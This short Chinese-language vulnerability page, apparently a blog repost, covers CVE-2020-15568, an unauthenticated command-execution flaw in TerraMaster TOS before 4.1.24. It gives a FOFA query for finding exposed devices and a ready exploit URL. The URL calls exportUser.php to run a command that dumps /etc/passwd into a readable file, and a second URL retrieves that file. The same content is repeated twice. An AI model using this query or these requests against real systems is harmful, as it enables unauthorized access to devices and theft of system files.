# CVE-2020-15568 TerraMaster TOS exportUser.php 遠程命令執行漏洞
TerraMaster TOS < 4.1.24
==FOFA==
"TerraMaster" && header="TOS"
include/class/application.class.php
中的PHP類是在運行TOS軟件的設備上執行命令的最佳人選。由於exportUser.php沒有身份驗證控件,因此未經身份驗證的攻擊者有可能通過提供以下值作為HTTP GET參數來實現代碼執行。
http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt
http://xxx.xxx.xxx.xxx/include/test.txt
TerraMaster TOS < 4.1.24
==FOFA==
"TerraMaster" && header="TOS"
在其他文件的代碼檢查期間,也發現有一種方法可以利用TOS軟件中預先存在的類來利用此問題。位於
include/class/application.class.php
中的PHP類是在運行TOS軟件的設備上執行命令的最佳人選。
由於exportUser.php沒有身份驗證控件,因此未經身份驗證的攻擊者有可能通過提供以下值作為HTTP GET參數來實現代碼執行。
http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt
返回200後再次訪問
http://xxx.xxx.xxx.xxx/include/test.txt
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容